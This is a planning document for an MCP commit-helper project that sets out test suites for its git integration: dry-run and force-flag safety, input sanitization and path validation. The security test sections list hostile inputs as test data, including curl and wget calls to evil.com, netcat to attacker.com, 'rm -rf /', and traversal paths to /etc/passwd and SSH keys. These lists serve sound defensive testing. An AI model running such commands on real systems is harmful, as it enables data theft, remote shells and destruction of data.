Commit Helper MCP

Overview Inspect Schema Related Servers Score Discussions

task-04-testing-validation.md•24.7 kB

# Task 4: Testing and Validation (Minutes 45-60) ## Objective Create comprehensive tests to validate git integration functionality and ensure safety mechanisms work correctly. ## Implementation ### Core Test Suite **File**: `tests/test_git_integration.py` ```python import pytest from unittest.mock import Mock, patch, MagicMock from pathlib import Path class TestGitService: """Test suite for GitService class functionality.""" def test_git_service_init_valid_repo(self): """Test GitService initialization in valid git repository.""" # Mock is_git_project or subprocess to return True # Initialize GitService # Assert service.repo_path is set correctly # Assert no exceptions raised def test_git_service_init_invalid_repo(self): """Test GitService initialization in non-git directory.""" # Mock is_git_project or subprocess to return False # Assert NotAGitProjectError is raised # Verify error message is appropriate def test_get_staged_files_with_files(self): """Test getting staged files when files are staged.""" # Mock git command or API to return file list # Call get_staged_files() # Assert correct file list returned def test_get_staged_files_empty(self): """Test getting staged files when no files staged.""" # Mock git command or API to return empty # Call get_staged_files() # Assert empty list returned def test_preview_commit_basic(self): """Test basic commit preview functionality.""" # Mock staged files # Call preview_commit() with test message # Assert preview contains: # - message # - staged_files # - dry_run=True # - git_command def test_preview_commit_with_stage_all(self): """Test commit preview with stage_all option.""" # Mock unstaged files # Call preview_commit() with stage_all=True # Assert preview shows all files would be staged def test_execute_commit_safety_check(self): """Test that execute_commit requires force flag.""" # Call execute_commit() with force=False # Assert operation returns error about requiring force # Assert no actual git command executed def test_execute_commit_dry_run_default(self): """Test that execute_commit defaults to dry_run.""" # Call execute_commit() without dry_run parameter # Assert dry_run=True in response # Assert no actual git command executed def test_execute_commit_actual_execution(self): """Test actual commit execution with force and dry_run=False.""" # Mock successful git commit # Call execute_commit() with force=True, dry_run=False # Assert commit was executed # Assert success response with commit hash def test_execute_commit_failure(self): """Test handling of git commit failures.""" # Mock failed git commit # Call execute_commit() with force=True, dry_run=False # Assert failure response with error details class TestCommitzenServiceGitIntegration: """Test integration of git functionality with CommitzenService.""" def test_service_init_with_git(self): """Test CommitzenService initialization with git available.""" # Mock GitService initialization success # Initialize CommitzenService # Assert git_enabled=True # Assert git_service is not None def test_service_init_without_git(self): """Test CommitzenService initialization without git.""" # Mock GitService to raise NotAGitProjectError # Initialize CommitzenService # Assert git_enabled=False # Assert git_service is None def test_preview_commit_operation_with_validation(self): """Test preview operation with message validation.""" # Mock valid message validation # Mock git preview # Call preview_commit_operation() # Assert combined validation and preview results def test_preview_commit_operation_invalid_message(self): """Test preview operation with invalid message.""" # Mock invalid message validation # Call preview_commit_operation() # Assert error response about invalid message def test_execute_commit_operation_full_pipeline(self): """Test full commit execution pipeline.""" # Mock message validation success # Mock git execution success # Call execute_commit_operation() with force=True # Assert successful execution with all validation steps class TestMCPToolsGitIntegration: """Test MCP tools for git operations.""" def test_get_git_status_enabled(self): """Test get_git_status tool when git is enabled.""" # Mock service with git_enabled=True # Mock repository status # Call get_git_status() # Assert comprehensive status returned def test_get_git_status_disabled(self): """Test get_git_status tool when git is disabled.""" # Mock service with git_enabled=False # Call get_git_status() # Assert error response with git_enabled=False def test_preview_git_commit_tool(self): """Test preview_git_commit MCP tool.""" # Mock service preview operation # Call preview_git_commit() with test parameters # Assert preview response format def test_execute_git_commit_tool_safety(self): """Test execute_git_commit tool safety mechanisms.""" # Call execute_git_commit() with force_execute=False # Assert safety error returned # Verify no actual execution occurred def test_execute_git_commit_tool_with_force(self): """Test execute_git_commit tool with force flag.""" # Mock successful execution # Call execute_git_commit() with force_execute=True # Assert execution results returned def test_generate_and_commit_preview_only(self): """Test generate_and_commit tool in preview mode.""" # Mock message generation # Mock commit preview # Call generate_and_commit() with preview_only=True # Assert combined generation and preview results def test_generate_and_commit_full_execution(self): """Test generate_and_commit tool with execution.""" # Mock message generation # Mock commit execution # Call generate_and_commit() with preview_only=False # Assert full workflow execution class TestSafetyMechanisms: """Test safety mechanisms and error handling.""" def test_default_dry_run_behavior(self): """Test that operations default to dry-run mode.""" # Test all git operations default to safe mode # Assert no actual git commands executed by default def test_force_flag_requirement(self): """Test that actual execution requires explicit force flag.""" # Test all execution operations require force=True # Assert operations fail safely without force flag def test_message_validation_integration(self): """Test message validation in git operations.""" # Test invalid messages are rejected # Test valid messages proceed to git operations def test_repository_validation(self): """Test repository state validation.""" # Test operations fail in non-git directories # Test operations validate repository state def test_error_handling_consistency(self): """Test consistent error handling across operations.""" # Test all operations return standardized error format # Test different error types are properly categorized class TestWorkflowIntegration: """Test complete workflow scenarios.""" def test_basic_commit_workflow(self): """Test complete basic commit workflow.""" # 1. Generate commit message # 2. Preview commit # 3. Execute commit with approval # Assert each step works correctly def test_selective_file_commit_workflow(self): """Test selective file commit workflow.""" # 1. Stage specific files # 2. Generate message # 3. Commit staged files # Assert workflow handles file selection def test_error_recovery_workflow(self): """Test workflow error handling and recovery.""" # Test workflow handles various error conditions # Test recovery from validation failures # Test recovery from git operation failures ``` ### Integration Test Suite **File**: `tests/test_git_mcp_integration.py` ```python class TestMCPGitIntegration: """Integration tests for MCP git functionality.""" def test_mcp_server_git_tools_registration(self): """Test that git tools are properly registered with MCP server.""" # Initialize MCP server # Assert git tools are available # Test tool discovery and metadata def test_end_to_end_commit_workflow(self): """Test complete end-to-end commit workflow through MCP.""" # Use MCP client to call tools in sequence # Test realistic commit scenario # Verify all safety mechanisms work through MCP def test_mcp_error_handling(self): """Test error handling through MCP protocol.""" # Test various error conditions through MCP # Verify error responses are properly formatted # Test error recovery scenarios ``` ### Mock Utilities **File**: `tests/conftest.py` (additions) ```python @pytest.fixture def mock_git_repo(): """Mock git repository for testing.""" # Create mock git repository structure # Mock common git operations # Return configured mock @pytest.fixture def mock_commitizen_service_with_git(): """Mock CommitzenService with git integration.""" # Create mock service with git enabled # Mock all git operations # Return configured service mock @pytest.fixture def sample_commit_data(): """Sample commit data for testing.""" return { "type": "feat", "subject": "add git integration", "body": "Implements git commit functionality with safety checks", "scope": "git", "breaking": False, "footer": "Closes #123" } ``` ### Performance Tests **File**: `tests/test_git_performance.py` ```python class TestGitPerformance: """Performance tests for git operations.""" def test_repository_status_performance(self): """Test performance of repository status operations.""" # Measure time for get_repository_status() # Assert reasonable performance thresholds def test_large_repository_handling(self): """Test handling of repositories with many files.""" # Mock large repository # Test staged file operations # Assert acceptable performance def test_concurrent_operations(self): """Test handling of concurrent git operations.""" # Test multiple simultaneous operations # Verify thread safety # Assert no race conditions ``` ## Test Execution Strategy ### Test Categories 1. **Unit Tests**: Individual component testing 2. **Integration Tests**: Component interaction testing 3. **Safety Tests**: Security and safety mechanism testing 4. **Performance Tests**: Performance and scalability testing 5. **End-to-End Tests**: Complete workflow testing ### Test Execution Commands ```bash # Run all git integration tests pytest tests/test_git_integration.py -v # Run safety mechanism tests specifically pytest tests/test_git_integration.py::TestSafetyMechanisms -v # Run performance tests pytest tests/test_git_performance.py -v # Run with coverage pytest tests/test_git_integration.py --cov=src/commitizen_mcp_connector --cov-report=html ``` ### Continuous Integration ```yaml # Add to CI pipeline - name: Test Git Integration run: | pytest tests/test_git_integration.py -v pytest tests/test_git_mcp_integration.py -v ``` ## Validation Checklist ### Functionality Validation - [ ] GitService initializes correctly in git repositories - [ ] GitService fails safely in non-git directories - [ ] Repository status operations work correctly - [ ] Commit preview shows accurate information - [ ] Commit execution works with proper safety checks - [ ] Message validation integrates with git operations - [ ] MCP tools are properly registered and accessible ### Safety Validation - [ ] Operations default to dry-run mode - [ ] Actual execution requires explicit force flags - [ ] Invalid messages are rejected before git operations - [ ] Repository validation prevents unsafe operations - [ ] Error handling provides clear feedback - [ ] No accidental commits possible through normal usage ### Integration Validation - [ ] Git functionality integrates with existing CommitzenService - [ ] MCP tools work correctly through protocol - [ ] Workflow tools support multi-step processes - [ ] Error responses are consistent across all tools - [ ] Performance is acceptable for typical repositories ## Success Criteria - [ ] All tests pass with >90% code coverage ⏳ **CAN PROCEED WITH BASIC SECURITY** - [ ] Safety mechanisms prevent accidental commits ✅ **ALREADY IMPLEMENTED** (force flags, preview modes) - [ ] Git operations work reliably in various scenarios ⏳ **PENDING IMPLEMENTATION** - [ ] Error handling is comprehensive and user-friendly ⏳ **PENDING IMPLEMENTATION** - [ ] Performance meets acceptable thresholds ⏳ **PENDING IMPLEMENTATION** - [ ] Integration with existing functionality is seamless ⏳ **PENDING IMPLEMENTATION** - [ ] **LOCAL USAGE**: Basic security implemented ⏳ **MINIMAL REQUIREMENTS** - [ ] **LOCAL USAGE**: Basic security testing implemented ⏳ **SIMPLIFIED REQUIREMENTS** - [ ] **LOCAL USAGE**: Input sanitization tested ⏳ **REQUIRED FOR LOCAL USAGE** ## Implementation Status ### ⚠️ LOCAL USAGE: Simplified Testing Requirements **Status**: ⚠️ **CAN PROCEED WITH BASIC SECURITY TESTING FOR LOCAL USAGE** Based on local usage analysis in `journal/git/local-usage-security-analysis.md`, testing requirements are significantly simplified for local-only deployment. **Revised Risk Assessment for Local Usage**: 1. **Command Injection** (MEDIUM - reduced from HIGH) - Basic sanitization testing needed 2. **Directory Traversal** (MEDIUM - reduced from HIGH) - Basic path validation testing needed 3. **Accidental Data Loss** (MEDIUM) - Already mitigated by force flags (tested ✅) **Eliminated Testing Requirements for Local Usage**: - ✅ Rate limiting tests - Not applicable for single user - ✅ Network security tests - No network exposure - ✅ Multi-user access tests - Single user environment - ✅ Comprehensive penetration testing - Overkill for local usage - ✅ Authentication tests - User already authenticated locally **Reference**: `journal/git/local-usage-security-analysis.md` ### Required Security Testing (PRIORITY) #### 1. Security Vulnerability Testing (CRITICAL) **File**: `tests/test_git_security.py` ```python class TestGitSecurity: """CRITICAL: Security vulnerability testing.""" def test_commit_message_injection_prevention(self): """Test protection against commit message injection attacks.""" malicious_messages = [ "feat: add feature `rm -rf /`", "fix: bug $(malicious_command)", "docs: update; rm important_file.txt", "chore: cleanup && curl evil.com/steal", "test: verify |& nc attacker.com 4444" ] for message in malicious_messages: with pytest.raises(SecurityError): git_service.execute_commit(message, force_execute=True) def test_file_path_traversal_prevention(self): """Test protection against directory traversal attacks.""" malicious_paths = [ "../../../etc/passwd", "../../.ssh/id_rsa", "../sensitive_file.key", "../../../../home/user/.bashrc", "..\\..\\windows\\system32\\config\\sam" ] for path in malicious_paths: with pytest.raises(SecurityError): git_service.add_files(path, force_execute=True) def test_sensitive_file_access_prevention(self): """Test blocking of sensitive file access.""" sensitive_files = [ ".env", ".key", ".pem", "password.txt", "secret.json", "private.key", "id_rsa" ] for file_path in sensitive_files: assert not git_service.check_file_access(file_path) def test_operation_rate_limiting(self): """Test rate limiting prevents abuse.""" # Attempt rapid-fire git operations for i in range(100): if i > 10: # Should be rate limited after 10 operations with pytest.raises(RateLimitError): git_service.get_repository_status() def test_audit_logging_functionality(self): """Test that all operations are logged for security audit.""" # Perform git operation git_service.preview_commit("test: audit logging") # Verify operation was logged assert security_audit_log.contains_operation("preview_commit") assert security_audit_log.contains_user_context() assert security_audit_log.contains_timestamp() ``` #### 2. Penetration Testing (CRITICAL) **File**: `tests/test_git_penetration.py` ```python class TestGitPenetrationTesting: """CRITICAL: Penetration testing for git integration.""" def test_shell_escape_attempts(self): """Test various shell escape techniques.""" escape_attempts = [ "; cat /etc/passwd", "| nc attacker.com 4444", "& wget evil.com/malware", "`whoami`", "$(id)", "${PATH}", "\n rm -rf /", "\r\n curl evil.com" ] for attempt in escape_attempts: message = f"feat: legitimate message {attempt}" # Should be blocked by security controls assert not git_service.execute_commit(message, force_execute=True)["success"] def test_privilege_escalation_attempts(self): """Test attempts to escalate privileges.""" # Test accessing files outside repository # Test executing privileged commands # Test bypassing permission checks def test_information_disclosure_prevention(self): """Test prevention of sensitive information disclosure.""" # Test that error messages don't leak sensitive info # Test that git operations don't expose system details # Test that audit logs don't contain sensitive data ``` #### 3. Input Validation Testing (CRITICAL) **File**: `tests/test_git_input_validation.py` ```python class TestGitInputValidation: """CRITICAL: Input validation and sanitization testing.""" def test_commit_message_sanitization(self): """Test commit message sanitization.""" dangerous_inputs = [ "message with `backticks`", "message with $(command)", "message with & ampersand", "message with | pipe", "message with ; semicolon", "message with > redirect", "message with < redirect", "message with () parentheses", "message with {} braces" ] for dangerous_input in dangerous_inputs: sanitized = sanitize_commit_message(dangerous_input) # Verify dangerous characters removed assert not any(char in sanitized for char in ['`', '$', '|', '&', ';', '>', '<']) def test_file_path_validation(self): """Test file path validation and normalization.""" invalid_paths = [ "../outside/repo", "/absolute/path", "~/home/path", "path/with/../traversal", "path/with/./current", "path\\with\\backslashes" ] for invalid_path in invalid_paths: with pytest.raises(ValidationError): validate_file_path(invalid_path, repo_root) ``` ### Current Testing Status #### ✅ Basic Functionality Tests (Completed) - GitService initialization testing - Repository validation testing - Preview functionality testing - Force flag safety testing - Error handling testing #### ❌ Security Tests (MISSING - CRITICAL) - Input sanitization testing - Injection attack prevention testing - Path traversal prevention testing - Permission validation testing - Rate limiting testing - Audit logging testing #### ❌ Integration Tests (BLOCKED) - MCP tool integration testing (blocked by security issues) - End-to-end workflow testing (blocked by security issues) - Performance testing (blocked by security issues) ### Security-First Testing Strategy #### Phase 1: Security Foundation Testing (REQUIRED FIRST) 1. **Input Sanitization Tests** - Verify all inputs are properly sanitized 2. **Injection Prevention Tests** - Test protection against code injection 3. **Access Control Tests** - Verify permission and access controls 4. **Audit Logging Tests** - Ensure all operations are logged 5. **Rate Limiting Tests** - Verify abuse prevention mechanisms #### Phase 2: Penetration Testing (AFTER PHASE 1) 1. **Automated Security Scanning** - Use security tools to scan for vulnerabilities 2. **Manual Penetration Testing** - Human security testing 3. **Red Team Assessment** - Adversarial security testing 4. **Vulnerability Assessment** - Comprehensive security review #### Phase 3: Integration Testing (AFTER SECURITY VALIDATION) 1. **Secure MCP Integration** - Test security-wrapped MCP tools 2. **End-to-End Security** - Test complete secure workflows 3. **Performance with Security** - Ensure security doesn't break performance 4. **User Experience** - Test usability with security controls ## Current Recommendation for Local Usage ### ✅ CAN PROCEED WITH SIMPLIFIED TESTING FOR LOCAL USAGE **Reason**: Local-only deployment significantly reduces security risks and testing complexity. ### 🔒 Simplified Local Testing Approach 1. **Implement basic security** (~1.5 hours): - Basic input sanitization for commit messages - Basic path validation for file operations - Basic security tests 2. **Implement functionality tests** with basic security 3. **Test local usage workflows** 4. **Iterate based on user feedback** ## Next Steps for Local Usage ### Phase 1: Basic Security Testing (~1 hour) 1. **Add basic input sanitization tests** (30 minutes) ```python def test_commit_message_sanitization(): """Test basic shell character removal.""" dangerous_message = "feat: add feature `rm file`" sanitized = sanitize_commit_message(dangerous_message) assert '`' not in sanitized ``` 2. **Add basic path validation tests** (15 minutes) ```python def test_file_path_validation(): """Test basic path traversal prevention.""" with pytest.raises(ValueError): validate_file_path("../outside/repo", repo_root) ``` 3. **Test existing safety mechanisms** (15 minutes) - Force flag requirement tests (already implemented ✅) - Preview mode tests (already implemented ✅) - Repository validation tests (already implemented ✅) ### Phase 2: Functionality Testing (After Phase 1) 1. **Implement core functionality tests** 2. **Add MCP integration tests** 3. **Test end-to-end local workflows** 4. **Performance testing for local usage** ### Simplified Testing Requirements for Local Usage - [ ] Basic input sanitization tests implemented and passing - [ ] Basic path validation tests implemented and passing - [ ] Force flag and preview mechanism tests passing (already implemented ✅) - [ ] Core functionality tests implemented and passing - [ ] MCP integration tests implemented and passing - [ ] Local workflow tests implemented and passing ### Not Required for Local Usage - ❌ Rate limiting tests - Not applicable for single user - ❌ Network security tests - No network exposure - ❌ Multi-user access tests - Single user environment - ❌ Comprehensive penetration testing - Overkill for local usage - ❌ Authentication tests - User already authenticated locally - ❌ Audit logging tests - Optional for local debugging **✅ ACCEPTABLE**: Current implementation with basic security additions and simplified testing is safe for local development use.

Loading blob content...

Latest Blog Posts

What are Claude Skills?
By punkpeye on January 10, 2026.
mcp
skills
How to Test MCP Streamable HTTP Endpoints Using cURL
By punkpeye on January 2, 2026.
tutorial
bash
What is Streamable HTTP in MCP?
By punkpeye on January 2, 2026.
Streamable HTTP

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/jolfr/commit-helper-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server

task-04-testing-validation.md•24.7 kB